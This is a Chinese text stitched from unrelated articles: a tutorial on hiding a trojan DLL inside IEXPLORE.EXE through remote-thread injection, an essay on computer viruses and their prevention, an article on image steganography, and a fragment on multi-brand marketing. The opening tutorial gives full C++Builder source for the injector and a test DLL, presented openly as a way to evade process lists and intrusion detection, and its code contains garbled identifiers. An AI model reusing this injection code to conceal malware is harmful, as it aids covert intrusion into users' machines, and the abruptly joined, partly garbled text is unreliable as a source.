2實現(xiàn)方法
為了弄清實現(xiàn)方法,我們必須首先了解Windows系統(tǒng)的另一種"可執(zhí)行文件"----DLL,DLL是DynamicLinkLibrary(動態(tài)鏈接庫)的縮寫,DLL文件是Windows的基礎(chǔ),因為所有的API函數(shù)都是在DLL中實現(xiàn)的。DLL文件沒有程序邏輯,是由多個功能函數(shù)構(gòu)成,它并不能獨立運行,一般都是由進(jìn)程加載并調(diào)用的。因為DLL文件不能獨立運行,所以在進(jìn)程列表中并不會出現(xiàn)DLL,假設(shè)我們編寫了一個木馬DLL,并且通過別的進(jìn)程來運行它,那么無論是入侵檢測軟件還是進(jìn)程列表中,都只會出現(xiàn)那個進(jìn)程而并不會出現(xiàn)木馬DLL,如果那個進(jìn)程是可信進(jìn)程,(例如瀏覽器程序IEXPLORE.EXE,沒人會懷疑它是木馬吧?)那么我們編寫的DLL作為那個進(jìn)程的一部分,也將成為被信賴的一員,也就達(dá)到了隱藏的目的。
運行DLL方法有多種,但其中最隱蔽的方法是采用動態(tài)嵌入技術(shù),動態(tài)嵌入技術(shù)指的是將自己的代碼嵌入正在運行的進(jìn)程中的技術(shù)。理論上來說,在Windows中的每個進(jìn)程都有自己的私有內(nèi)存空間,別的進(jìn)程是不允許對這個私有空間進(jìn)行操作的,但是實際上,我們?nèi)匀豢梢岳梅N種方法進(jìn)入并操作進(jìn)程的私有內(nèi)存。動態(tài)嵌入技術(shù)有多種如:窗口Hook、掛接API、遠(yuǎn)程線程等,這里介紹一下遠(yuǎn)程線程技術(shù),它只要有基本的進(jìn)線程和動態(tài)鏈接庫的知識就可以很輕松地完成動態(tài)嵌入。
遠(yuǎn)程線程技術(shù)指的是通過在另一個進(jìn)程中創(chuàng)建遠(yuǎn)程線程的方法進(jìn)入那個進(jìn)程的內(nèi)存地址空間。我們知道,在進(jìn)程中,可以通過CreateThread函數(shù)創(chuàng)建線程,被創(chuàng)建的新線程與主線程(就是進(jìn)程啟動時被同時自動建立的那個線程)共享地址空間以及其他的資源。但是很少有人知道,通過CreateRemoteThread也同樣可以在另一個進(jìn)程內(nèi)創(chuàng)建新線程,被創(chuàng)建的遠(yuǎn)程線程同樣可以共享遠(yuǎn)程進(jìn)程(是遠(yuǎn)程進(jìn)程)的地址空間,所以,實際上,我們通過一個遠(yuǎn)程線程,進(jìn)入了遠(yuǎn)程進(jìn)程的內(nèi)存地址空間,也就擁有了那個遠(yuǎn)程進(jìn)程相當(dāng)?shù)臋?quán)限。
3實施步驟
1)用Process32Next()函數(shù)找到宿主進(jìn)程,獲取宿主進(jìn)程ID,并用
OpenProcess()函數(shù)打開宿主進(jìn)程。
2)用VirtualAllocEx()函數(shù)分配遠(yuǎn)程進(jìn)程地址空間中的
內(nèi)存。
3)用WriteProcessMemory()函數(shù)將待隱藏的DLL的路徑名。
4)拷貝到步驟二已經(jīng)分配的內(nèi)存中。
5)用GetProcAddress()函數(shù)獲取LoadlibraryA()函數(shù)的實地址(在kernel32.dll中)。
6)用CreateRemoteThread()函數(shù)在遠(yuǎn)程進(jìn)程中創(chuàng)建一個線程。
7)它調(diào)用正確的LoadlibraryA()函數(shù)。
8)為它傳遞步驟二中分配的內(nèi)存地址。
4具體實例
下面是在C++Builder4.0環(huán)境下編寫的運用遠(yuǎn)程線程技術(shù)隱藏木馬的程序代碼:
#include<vcl.h>
#include<windows.h>
#include<stdio.h>
#include<tlhelp32.h>//該頭文件包涵了進(jìn)程操作的API函數(shù)
#pragmahdrstop
#include"Unit1.h"
#pragmapackage(smart_init)
#pragmaresource"*.dfm"
InsistingpszLibFileName;//存放待隱藏的DLL文件名
HANDLEhProcessSnap=NULL;//進(jìn)程快照句柄
HANDLEhRemoteProcess;//遠(yuǎn)程進(jìn)程句柄
LPVOIDpszLibFileRemote;//遠(yuǎn)程進(jìn)程中分配給文件名的空間
HMODULEphmd;//存放kernel32.dll句柄
HANDLEhRemoteThread1=NULL;//存放遠(yuǎn)程線程句柄
TForm1*Form1;
//---------------------------------------------------------
__fastcallTForm1::TForm1(TComponent*Owner)
:TForm(Owner)
{
}
//---------------------------------------------------------
void__fastcallTForm1::Button1Click(TObject*Sender
{
PROCESSENTRY32pe32={0};
DWORDdwRemoteProcessId;
hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
//打開進(jìn)程快照
if(hProcessSnap==(HANDLE)-1)
{
MessageBox(NULL,"CreateToolhelp32Snapshotfailed","",MB_OK);
exit(0);
}//失敗返回
pe32.dwSize=sizeof(PROCESSENTRY32);
if(Process32Fi
rst(hProcessSnap,&pe32))//獲取第一個進(jìn)程
{
do{
AnsiStringte;
te=pe32.szExeFile;
if(te.Pos("iexplore.exe")||te.Pos("IEXPLORE.EXE"))
//找到宿主進(jìn)程,以IEXPLORE.EXE為例
{dwRemoteProcessId=pe32.th32ProcessID;
break;
}
}
while(Process32Next(hProcessSnap,&pe32));//獲取下一個進(jìn)程
}
else
{
MessageBox(NULL,"取第一個進(jìn)程失敗","",MB_OK);
exit(0);
}
hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM
_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);
//打開遠(yuǎn)程進(jìn)程
pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";
//假設(shè)hide.dll是待隱藏的進(jìn)程
intcb=(1+pszLibFileName.Length())*sizeof(char);//計算dll文件名長度
pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,
MEM_COMMIT,PAGE_READWRITE);
//申請存放文件名的空間
BOOLReturnCode=WriteProcessMemory(hRemoteProcess,
pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);
//把dll文件名寫入申請的空間
phmd=GetModuleHandle("kernel32.dll");
LPTHREAD_START_ROUTINEfnStartAddr=(LPTHREAD_START_ROUTINE)
GetProcAddress(phmd,"LoadLibraryA");
//獲取動態(tài)鏈接庫函數(shù)地址
hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,
pfnStartAddr,pszLibFileRemote,0,NULL);
//創(chuàng)建遠(yuǎn)程線
if(hRemoteThread1!=NULL)
CloseHandle(hRemoteThread1);//關(guān)閉遠(yuǎn)程線程
if(hProcessSnap!=NULL)
CloseHandle(hProcessSnap);//關(guān)閉進(jìn)程快照
}
該程序編譯后命名為RmtDll.exe,運行時點擊界面上的按鈕即可。
至此,遠(yuǎn)程嵌入順利完成,為了試驗我們的hide.dll是不是已經(jīng)正常地在遠(yuǎn)程線程運行,我同樣在C++Builder4.0環(huán)境下編寫并編譯了下面的hide.dll作為測試:
nclude<vcl.h>
#include<windows.h>
#pragmahdrstop
#pragmaargsused
BOOLWINAPIDllEntryPoint(HINSTANCEhinst,unsignedlongreason,void*lpReserved)
{
charszProcessId[64];
switch(reason)
{
caseDLL_PROCESS_ATTACH:
{//獲取當(dāng)前進(jìn)程ID
itoa(GetCurrentProcessId(),szProcessId,10);
MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);
break;
}
default:
}
returnTRUE;
}
當(dāng)使用RmtDll.exe程序?qū)⑦@個hide.dll嵌入IEXPLORE.EXE進(jìn)程后假設(shè)PID=1208),該測試DLL彈出了1208字樣的確認(rèn)框,同時使用PS工具
也能看到:
ProcessID:1208
C:\WINNT\IEXPLORE.EXE(0x00400000)
……
C:\WINNT\hide.dll(0x100000000)
……
這證明hide.dll已經(jīng)在IEXPLORE.EXE進(jìn)程內(nèi)正確地運行了。上面程序的頭文件由編譯器自動生成,未作改動,故略之。
5結(jié)束語
進(jìn)程隱藏技術(shù)和方法有很多,而且這一技術(shù)發(fā)展也相當(dāng)快,本文僅從一個側(cè)面加以討論,希望通過這一探討讓我們對進(jìn)程隱藏技術(shù)有一個更清楚的認(rèn)識,同時也為我們防范他人利用進(jìn)程隱藏手段非法入侵提供參考,本文拋磚引玉,不當(dāng)之處誠懇批評指正。
參考文獻(xiàn)
0引言
計算機網(wǎng)絡(luò)是信息社會的基礎(chǔ),已經(jīng)進(jìn)入了社會的各個角落,經(jīng)濟、文化、軍事和社會生活越來越多的依賴計算機網(wǎng)絡(luò)。然而,計算機在給人們帶來巨大便利的同時,也帶來了不可忽視的問題,計算機病毒給網(wǎng)絡(luò)系統(tǒng)的安全運行帶來了極大的挑戰(zhàn)。2003年1月25日,突如其來的“蠕蟲王”病毒,在互聯(lián)網(wǎng)世界制造了類似于“9.11”的恐怖襲擊事件,很多國家的互聯(lián)網(wǎng)也受到了嚴(yán)重影響。同樣,前兩年李俊制作的“熊貓燒香”病毒再次為計算機網(wǎng)絡(luò)安全敲起了警鐘。據(jù)美國計算機權(quán)威組織報告,全球已發(fā)現(xiàn)的計算機病毒總和超過6萬多種,而且每天還有100多種以上的新病毒問世,同時計算機病毒在2000年造成的全球經(jīng)濟損失高達(dá)1.6萬億美元。因此,研究計算機病毒與防治就顯得極具緊迫,意義重大。
1計算機病毒的含義
關(guān)于計算機病毒的定義,目前國內(nèi)外有各種各樣的定義,但在《中華人民共和國計算機系統(tǒng)安全保護(hù)條例》中對病毒是這樣定義的:“編制或在計算機程序中插入的破壞計算機功能或者數(shù)據(jù),影響計算機使用,并且能夠自我復(fù)制的一組計算本論文由整理提供機指令或者程序代碼”。因此,像炸彈、蠕蟲、熊貓燒香等均可稱為計算機病毒。
2計算機病毒的特征
計算機病毒是一段特殊的程序。除了與其他程序一樣,可以存儲和運行外,計算機病毒還有感染性、潛伏性、可觸發(fā)性、破壞性衍生性等特征。下面簡單就計算機病毒的特性加以介紹:
①感染性。計算機病毒的感染性也稱為寄生性,是指計算機病毒程序嵌入到宿主程序中,依賴于宿主程序的執(zhí)行而生成的特性。計算機病毒的感染性是計算機病毒的根本屬性,是判斷一個程序是否為病毒程序的主要依據(jù)。②隱蔽性。隱蔽性是計算機病毒的基本特征之一。從計算機病毒隱藏的位置來看,不同的病毒隱藏在不同的位置,有的隱藏在扇區(qū)中,有的則以隱藏文件的形式出現(xiàn),讓人防不勝防。③潛伏性。計算機病毒的潛伏性是指其具有依附于其他媒體而寄生的能力,通過修改其他程序而把自身的復(fù)制體嵌入到其他程序或者磁盤的引導(dǎo)區(qū)甚至硬盤的主引導(dǎo)區(qū)中寄生。④可觸發(fā)性。計算機病毒一般都具有一個觸發(fā)條件:或者觸發(fā)其感染,即在一定的條件下激活一個病毒的感染機制使之進(jìn)行感染;或者觸發(fā)其發(fā)作,即在一定的條件下激活病毒的表現(xiàn)攻擊破壞部本論文由整理提供分。⑤衍生性。計算機病毒的衍生性是指計算機病毒的制造者依據(jù)個人的主觀愿望,對某一個已知病毒程序進(jìn)行修改而衍生出另外一中或多種來源于同一種病毒,而又不同于源病毒程序的病毒程序,即源病毒程序的變種。這也許就是病毒種類繁多、復(fù)雜的原因之一。⑥破壞性。計算機病毒的破壞性取決于計算機病毒制造者的目的和水平,它可以直接破壞計算機數(shù)據(jù)信息、搶占系統(tǒng)資源、影響計算機運行速度以及對計算機硬件構(gòu)成破壞等。正是由于計算機病毒可怕的破壞性才使得計算機病毒令人如此恐怖。
3計算機病毒的類型
對于計算機病毒的類型,不同的范疇有著不同的類型定義。下面就簡單介紹一種計算機病毒的分類:
①引導(dǎo)區(qū)病毒。引導(dǎo)區(qū)病毒隱藏在硬盤或軟盤的引導(dǎo)區(qū),當(dāng)計算機從感染了引導(dǎo)區(qū)病毒的硬盤或軟盤啟動,或當(dāng)計算機從受感染的軟盤里讀取數(shù)據(jù)時,引導(dǎo)區(qū)病毒就開始發(fā)作。②文件型病毒。文件型病毒寄生在其他文件中,常常通過對病毒的編碼加密或是使用其他技術(shù)來隱藏自己。③腳本病毒。腳本病毒依賴一種特殊的腳本語言來起作用,同時需要主軟件或是應(yīng)用環(huán)境能夠正確地識別和翻譯這種腳本語言中嵌套的命令。④“特洛伊木馬”程序。特洛伊木馬程序比起其他各種惡意的軟件來說都更加了解用戶的心里狀態(tài)——這種程序的創(chuàng)作者用在怎么樣使運行特洛伊木馬程序的功夫可能和他們創(chuàng)作木馬的時間一樣多。
4計算機病毒的發(fā)展趨勢
傳統(tǒng)的計算機病毒是指利用網(wǎng)絡(luò)進(jìn)行傳播的一類病毒的總稱。而現(xiàn)在網(wǎng)絡(luò)時代的計算機病毒,已經(jīng)不是如此單純的一個概念,它被溶進(jìn)了更多的東西。如今的計算機病毒是指以網(wǎng)絡(luò)為平臺,對計算機安全產(chǎn)生安全的所有程序的總和。
4.1“間諜”式木馬病毒出現(xiàn)。如果說傳統(tǒng)木馬病毒是個騙子的話,那么現(xiàn)在的木馬病毒則更像一個活生生的間諜。如今“間諜本論文由整理提供”式木馬病毒一般是指利用系統(tǒng)漏洞進(jìn)入用戶的計算機系統(tǒng),通過修改注冊表自動啟動,運行時故意不被察覺,將用戶計算機系統(tǒng)中的所有信息都暴露在網(wǎng)絡(luò)中的病毒程序。
4.2可以自我完善的蠕蟲病毒出現(xiàn)。如今的蠕蟲病毒除了利用網(wǎng)絡(luò)缺陷外,更多地利用了一些新的騙人技術(shù)。如:“密碼”病毒是利用人們的好奇心理,誘使用戶來主動運行病毒,等等。
4.3黑客程序。隨著網(wǎng)絡(luò)的發(fā)展與人們?nèi)找嬖鲩L的安全需求,必須重新來審視黑客程序。黑客程序一般都有攻擊性,它會利用漏洞在遠(yuǎn)程控制計算機,甚至直接破壞計算機。黑客程序會與木馬程序相結(jié)合,對計算機安全構(gòu)成威脅,所以黑客程序也是一種計算機病毒。
總之,現(xiàn)在的計算機病毒都呈現(xiàn)出隱蔽性、欺騙性等復(fù)雜的特點,讓人們在毫無警覺的情況下使計算機系統(tǒng)遭到破壞。
5計算機病毒的預(yù)防措施
5.1引導(dǎo)型病毒的預(yù)防引導(dǎo)性病毒一般在啟動計算機時,優(yōu)先獲得控制權(quán),強占內(nèi)存。通常情況下,只要不用軟盤或者只用“干凈的”軟盤啟動系統(tǒng),是不會染上引導(dǎo)型病毒的。對軟盤進(jìn)行寫保護(hù),則可以很好地保護(hù)軟盤不被非法寫入,從而不被感染上啟動型病毒。但要保護(hù)硬盤的安全,除了從操作方面注意外,只有采取用軟盤來保護(hù)硬盤的措施。
5.2文件型病毒的預(yù)防文本論文由整理提供件型病毒的預(yù)防方法是在源程序中增加自檢及清楚病毒的功能。這種方法可以使得可執(zhí)行文件從一生成就具有抗病毒的能力,從而可以保證可執(zhí)行文件的干凈。自檢清除功能部分和可執(zhí)行文件的其他文件融為一體,不會和程序的其他功能沖突,也使得病毒制造者無法造出針對性的病毒來??蓤?zhí)行文件染不上病毒,文件型病毒就無法傳播了。
5.3個性化的預(yù)防措施計算機病毒的感染總是帶有普遍性的或大眾化的,以使計算機病毒范圍盡可能的廣,所以有時一些個性化的處理可能對計算機病毒的預(yù)防或者免疫具有非常好的效果。如:給一些系統(tǒng)文件改名或擴展名;對一些文件甚至子目錄加密。使得計算機病毒搜索不到這些系統(tǒng)文件。
5.4加強IT行業(yè)從業(yè)人員的職業(yè)道德教育關(guān)于計算機病毒的防治,除了從技術(shù)層面來加以維護(hù)和防治外,加強對計算機從業(yè)人員(在此指的是IT行業(yè)的“精英”,可以制造計算機病毒的高智商人群)的職業(yè)道德教育顯得也極其重要。如果他們有著很高的職業(yè)道德,他們就不會對網(wǎng)絡(luò)安全構(gòu)成威脅,令全世界計算機用戶為之緊張。反而可以可以在計算機領(lǐng)域為人類作出積極而巨大的貢獻(xiàn)。
5.5完善計算機病毒防治方面的法律法規(guī)在加強對計算機行業(yè)高智商從業(yè)人員進(jìn)行道德教育的同時,也應(yīng)該完善計算機病毒防治方面的相關(guān)法律法規(guī),充分發(fā)揮法律法規(guī)的約束作用。目前我國已經(jīng)制定了《中華人民共和國計算機信息系統(tǒng)安全保護(hù)條例》、《計算機信息系統(tǒng)安全專用產(chǎn)品檢測和銷售許可證管理辦法》等相關(guān)法律法規(guī),此外《中華人民共和國刑法》也對危害網(wǎng)絡(luò)安全的行為作出了規(guī)定和懲罰。超級秘書網(wǎng)
5.6加強國際交流與合本論文由整理提供作在經(jīng)濟全球化的宏觀背景下,計算機網(wǎng)絡(luò)世界早已融為一體,跨國進(jìn)行計算機病毒攻擊也已出現(xiàn)。為此,世界各國要本著維護(hù)計算機網(wǎng)絡(luò)安全運行的高度,加強交流與合作,共同打擊計算機病毒犯罪,此舉已顯得刻不容緩。
6結(jié)語
隨著計算機網(wǎng)絡(luò)技術(shù)的不斷發(fā)展,計算機給人類經(jīng)濟、文化、軍事和社會活動帶來更多便利的同時,也帶來了相當(dāng)巨大的安全挑戰(zhàn)?,F(xiàn)代信息網(wǎng)絡(luò)面臨著各種各樣的安全威脅,有來自網(wǎng)絡(luò)外面的攻擊,比如網(wǎng)絡(luò)黑客、計算機病毒等。因此合理有效的預(yù)防是防治計算機病毒最有效,最經(jīng)濟省力,也是最應(yīng)該值得重視的問題。研究計算機病毒與預(yù)防有利于我們正確認(rèn)識、感知、防范計算機病毒的攻擊,以保護(hù)計算機網(wǎng)絡(luò)安全,使得計算機網(wǎng)絡(luò)真正發(fā)揮其積極的作用,促進(jìn)人類經(jīng)濟、文化、軍事和社會活動的健康。
參考文獻(xiàn):
[1]卓新建,鄭康鋒,辛陽.計算機病毒原理與防治[M].北京郵電大學(xué)出版社,2007,(8):第二版.
[2]郝文化.防黑反毒技術(shù)指南[M].機械工業(yè)出版社,2004,(1):第一版.
[3]程勝利,談冉,熊文龍等.計算機病毒與其防治技術(shù)[M].清華大學(xué)出版社,2004,(9):第一版.
[4]張仁斌,李鋼,侯.計算機病毒與反病毒技術(shù)[M].清華大學(xué)出版社,2006(6).
關(guān)鍵詞:信息隱藏;信息隱寫;隱藏質(zhì)量;隱藏容量
中圖分類號:TP391.4
1 信息隱藏技術(shù)與傳統(tǒng)加密技術(shù)
信息隱藏是把秘密信息隱藏到載體信息中,而在感官上不改變載體本身,實質(zhì)上因為隱藏了秘密信息,雖然載體信息本身也做了修改,但人類感覺器官的具有不敏感性,而且數(shù)字多媒體信號本身具有冗余性,這使得加載了秘密信息后的信息與原有的載體信息在感官上沒有明顯區(qū)別,載密后的信息的使用價值也不改變。
信息隱藏技術(shù)與傳統(tǒng)加密技術(shù)的目的都是為了保護(hù)秘密信息,但二者還是有一定區(qū)別。最主要的區(qū)別是信息隱藏技術(shù)對載體信號的改變在人的感官層面不容易被發(fā)現(xiàn),可以將秘密信息隱藏于人人可見的載體中,而傳統(tǒng)加密技術(shù)對秘密信息加密后產(chǎn)生的多數(shù)是沒有意義的信息,容易被發(fā)現(xiàn),從而有針對性的破解。換言之,通過信息隱藏技術(shù)載密后,信息在感官上沒有明顯變化,除了秘密發(fā)送和接收方可以訪問載密信息。與加密技術(shù)結(jié)合使用稱為有密鑰信息隱藏,即在嵌入秘密信息前,先將秘密信息進(jìn)行加密處理,同時生成一個密鑰。在提取秘密信息時,擁有權(quán)限者先得到的是加密的秘密信息,要用發(fā)送方提供的正確的密鑰,還原加密的秘密信息為明文。
信息隱藏技術(shù)主要有隱寫術(shù)、數(shù)字水印技術(shù)、可視密碼技術(shù)、潛信道、隱匿協(xié)議等方法;在具體應(yīng)用中按載體信號的不同分為基于文本、基于數(shù)字圖像、基于音頻、基于視頻等。
2 信息隱寫與數(shù)字水印
隱寫術(shù)是指把隱秘信息嵌入到宿主信息中來進(jìn)行傳輸,并保證隱秘信息不被未授權(quán)的第三方發(fā)現(xiàn)。因此,隱寫術(shù)要求大容量嵌入與較高的隱蔽性。
數(shù)字水印是基于版權(quán)保護(hù)的應(yīng)用而產(chǎn)生的,指嵌入在數(shù)字產(chǎn)品中的信息。數(shù)字水印與隱寫術(shù)的區(qū)別在于其應(yīng)用的目的不同,隱寫術(shù)的目的在于隱藏信息,而數(shù)字水印的目的在于版權(quán)保護(hù),因此水印的魯棒性要求較高,但嵌入容量要求較小。
3 信息隱寫算法的評價
在評價信息隱藏算法時,根據(jù)信息隱藏的不同應(yīng)用場合,有如下技術(shù)性能的要求:(1)不可檢測性,指的是載密信號與原始信號具有相同的特點,不容易被檢測出來。(2)不可感知性,指載密后的信息外觀形態(tài)不因為嵌入的秘密信息而發(fā)生明顯的感官變化,不易被發(fā)現(xiàn)是載有秘密的信息。(3)安全性,是指隱藏算法要有抗攻擊能力,非授權(quán)用戶即使知道該信息為載密信息而對其進(jìn)行攻擊,也不能破壞原有信息和提取出秘密信息。(4)魯棒性,是對載密信號在傳輸過程中受到一些正常操作,載體中的隱藏信息的具有承受能力,不易損。(5)對稱性,是指信息隱藏中秘密信息的嵌入和提取過程是互逆的,也就是嵌入秘密信息和提取秘密信息可以使用同一算法。(6)自恢復(fù)性,在信息傳遞過程中,某些操作或者變換會對載密信息造成較大的破壞。這時為了保證信息的可用,可根據(jù)破壞后留下的數(shù)據(jù)片段,恢復(fù)出秘密信息,即自恢復(fù)性。
在信息隱藏算法開發(fā)和研究過程中,人們希望可以滿足以上所有的要求,但是在實際情況下,因為有些特性是互斥的,很難同時滿足所有特性,可以根據(jù)實際應(yīng)用場合及媒體特點側(cè)重某些方面。通常來說,嵌入秘密信息的信息容量與算法的不可感知性和魯棒性成反比,也就是說隱藏的信息量越大,載密后信息的越容易被發(fā)現(xiàn)和被損壞。
隱寫術(shù)作為信息隱藏的一種應(yīng)用,我們主要關(guān)注的性能參數(shù)是隱藏質(zhì)量和隱藏容量。隱藏質(zhì)量,是載密后對人類感官的影響程度。由于人類個體的差異,在判斷同一個目標(biāo)時,會有不同的評價,所以不能有效地評價含密載體與原始載體的差別大小。為了使評價更容易量化,不因為個體差異而無法準(zhǔn)確形容和評價載密前后的差異,引入一個國際通用的評價標(biāo)準(zhǔn)峰值信噪比PSNR。PSNR是指最大可能功率和影響它的表示精度的破壞性噪聲功率的比值。在隱寫中用來評價載密前后信息的相似程度。秘密信息通過某個隱寫算法嵌入到原始載體后,如果載密后圖像與其原始載體之間的PNSR值越大,說明該算法的隱藏質(zhì)量越好。但是PSNR的分?jǐn)?shù)和人眼看到的視覺品質(zhì)也不是完全一致,有可能PSNR較高者看起來的效果反而不如PSNR較低者。隱藏容量也叫做隱藏載荷ER,表示所嵌入的秘密信息位占整個載體圖像像素點的百分比。多數(shù)算法都希望載體圖像能夠攜帶更多的信息,即有較大的隱藏容量,但隱藏容量和隱藏質(zhì)量往往相互制約,當(dāng)隱藏的信息容量變化時,質(zhì)量也會隨之變化。
4 隱寫術(shù)工作原理及相關(guān)算法
在對信息隱寫算法優(yōu)化時主要通過兩個方面的實現(xiàn)。一是通過人的感官特性,人眼對圖像的視覺分成敏感的平滑區(qū)和遲鈍的邊緣區(qū),對于平滑去減少隱藏容量,對于邊緣區(qū)加大隱藏容量;二是圖像也可以分區(qū),稱之為分塊,對于不同特性的分塊可以采用不同的嵌入算法。
主流的隱寫算法是空域算法中的最低有效位LSB算法。該算法基本思想是將秘密信息嵌入到載體圖像像素值的最不顯著位也即最低有效位,從而達(dá)到隱藏秘密信息的目的,因為是最不顯著位,所以改變這一位置對宿主圖像的感官效果不產(chǎn)生影響。LSB的基本步驟是:把秘密信息轉(zhuǎn)換為二進(jìn)制數(shù)據(jù),將秘密二進(jìn)制數(shù)據(jù)與像素最低有效位對比,若相同,保留信息,否則將載體像素的最低有效位用最低秘密信息直接替換,就得到了載密二進(jìn)制信息,最后將該二進(jìn)制數(shù)據(jù)轉(zhuǎn)換為十進(jìn)制像素值,也就是含有秘密信息的圖像。最小有效位算法容易實現(xiàn),而且嵌入信息容量大,是當(dāng)前各種衍生算法的根本核心。
本文在這里介紹一種基于JPEG圖像的分塊隱寫算法。首先把秘密信息轉(zhuǎn)化為二進(jìn)制信息,將圖像分成8*8的分塊,根據(jù)量化后的離散余弦變換系數(shù)DCT,計算分塊的不為零的交流系數(shù)個數(shù)。根據(jù)隱藏的容量的大小,確定閾值。根據(jù)閾值將圖像塊分成人眼敏感程度不同的三種類型,不同類型的分塊采取不同的隱藏算法嵌入數(shù)據(jù)。人眼不敏感的子塊,嵌入較大量信息,仍然可以保持較好的隱藏質(zhì)量,反之人眼較敏感的分塊,為了保證隱藏質(zhì)量,嵌入較小量信息。在進(jìn)行秘密信息提取時,分塊提取也就是嵌入過程的逆過程,再把所有分塊中提取的秘密信息合成原有秘密信息。通過實驗數(shù)據(jù)表明,該算法有效地平衡了隱藏質(zhì)量和隱藏容量之間的關(guān)系,同時避免了方塊效應(yīng),從而在隱藏質(zhì)量得到保證的前提下大幅提高了隱藏容量。
通過數(shù)字隱寫完成秘密通信分為嵌入過程、傳輸過程和提取過程三個階段。密秘信息通過特定嵌入算法隱藏到原始載體中(也可以將秘密信息用傳統(tǒng)方法結(jié)合秘鑰加密后嵌入),形成含密載體,通過傳輸信道將含密載體發(fā)送出去。接收方通過隱寫檢測區(qū)分是否為含密載體,若是,再結(jié)合密鑰對含密載體使用提取算法,提取出秘密信息。
5 結(jié)束語
信息隱寫技術(shù)現(xiàn)在已經(jīng)成為了信息安全的一個熱點,廣泛應(yīng)用于各國軍事部門、安全部門的信息加密及情報傳輸?shù)确矫?。目前?shù)字圖像信息隱藏技術(shù)已經(jīng)比較完善和成熟,但音頻和視頻作為網(wǎng)絡(luò)上新興和主流的數(shù)字媒體,是信息隱藏技術(shù)更廣闊的載體領(lǐng)域,而且人的視覺和聽覺也有不敏感性,所以基于音頻和視頻的隱寫算法研究也將是今后信息隱寫技術(shù)的工作重點。
參考文獻(xiàn):
[1]江小帆,戴躍偉,茅耀斌.信息隱藏技術(shù)-方法與應(yīng)用[M].北京:機械工業(yè)出版社,2001.
[2]Cheng-Hsing Yang.Inverted pattern approach to improve image quality of information hiding by LSBsubstitution.Pattern Recognition,Volume 41,Issue 8,August 2008,Pages 2674-2683.
[3]徐凱平,鄭洪源,丁秋林.一種基于LSB和PVD的圖像信息隱藏算法研究[J].計算機應(yīng)用研究,2010,27(3):1068-1070.
[4]王現(xiàn)會.基于JPEG圖像信息隱藏算法研究[D].廣西師范大學(xué)碩士學(xué)位論文,2012.
多品牌策略就是給每一種產(chǎn)品冠以一個品牌名稱,或是給每一類產(chǎn)品冠以一個品牌名稱。多品牌策略主要包括兩種情況:一是在不同的目標(biāo)市場上,對同種產(chǎn)品分別使用不同的品牌;二是在同一市場上,對某種產(chǎn)品同時或連續(xù)使用不同的品牌。例如,寶潔公司在中國推出了四個品牌洗發(fā)水:海飛絲、飄柔、潘婷、沙宣,每一品牌都以基本功能以上的某一特殊功能為訴求點,吸引著不同需要的消費者。希望自己“免去頭屑煩惱”的人會選擇海飛絲;希望自己頭發(fā)“營養(yǎng)、烏黑亮澤”的人會選擇潘婷;希望自己頭發(fā)“舒爽、柔順、飄逸瀟灑”的人會選擇飄柔;希望自己頭發(fā)“保濕、富有彈性”的人會選擇沙宣。
二、多品牌策略的優(yōu)點
多品牌策略在實踐中屢見不鮮,多品牌策略的優(yōu)點很多,主要有:
(一)多品牌具有較強的靈活性。沒有一種產(chǎn)品是十全十美的,也沒有一個市場是無懈可擊的。浩瀚的市場海洋,為企業(yè)提供了許多平等競爭的機會,關(guān)鍵在于企業(yè)能否及時抓住機遇,在市場上搶占一席之地。見縫插針就是多品牌靈活性的一種具體表現(xiàn)。
(二)多品牌能充分適應(yīng)市場的差異性。消費者的需求是千差萬別的、復(fù)雜多樣的,不同的地區(qū)有不同的風(fēng)俗習(xí)慣;不同的時間有不同的審美觀念;不同的人有不同的愛好追求,等等。
(三)多品牌有利于提高產(chǎn)品的市場占有率。多品牌策略最大的優(yōu)勢便是通過給每一品牌進(jìn)行準(zhǔn)確定位,從而有效地占領(lǐng)各個細(xì)分市場。如果企業(yè)原先單一目標(biāo)顧客范圍較窄,難以滿足擴大市場份額的需要,此時可以考慮推出不同檔次的品牌,采取不同的價格水平,形成不同的品牌形象,以抓住不同偏好的消費者。
多品牌策略不僅僅是企業(yè)滿足消費需求的被動選擇,也是企業(yè)制定競爭戰(zhàn)略的主動選擇。對市場攻擊者和挑戰(zhàn)者而言,其搶占市場的一個慣用伎倆就是發(fā)展出一個專門針對某一細(xì)分市場的品牌來逐漸蠶食;對市場領(lǐng)導(dǎo)者而言,與其坐等對手來占據(jù)某一細(xì)分市場,不如自己先發(fā)展出一個品牌去搶占,實施有效防御,從而鎖定不同目標(biāo)消費群。
三、多品牌策略的不足
當(dāng)然,每個策略都不是完美的,多品牌策略也存在著缺陷,企業(yè)若在同一市場中發(fā)展多個品牌,成本成長的速度會比收入還快,在零售商與內(nèi)部資源分配上,也會遇上復(fù)雜的管理難題。在推出一項品牌之前,企業(yè)通常會比較它們預(yù)期會產(chǎn)生的額外收入以及行銷該品牌的成本。這類成本通常超乎主管的想像,因為“多品牌”策略有一項嚴(yán)重的限制;它會因不具規(guī)模經(jīng)濟而受害。一家公司會因在一個市場中推出數(shù)個品牌,而招致隱藏的成本,而且在事情發(fā)展超過某一點之后,就會有綁手綁腳之苦。
盡管隱藏成本的累積速度相當(dāng)緩慢,但如果公司將太多品牌塞入這個產(chǎn)品類別,隱藏的成本就出現(xiàn)了。隱藏成本有四種可能呈現(xiàn)方式:
(一)成本重疊。當(dāng)企業(yè)無法透過獨一無二的方式為每一個品牌進(jìn)行定位時,成本就會攀升。通常,品牌會在特色、屬性或價格方面出現(xiàn)重疊,只是企業(yè)主管未意識到罷了。這些品牌彼此競爭的程度,和它們與對手品牌之間的競爭程度不相上下,而且最后通常演變?yōu)楸舜嘶ハ嗤淌?。如此一來,公司成本的上升速度會比收入成長速度還快。
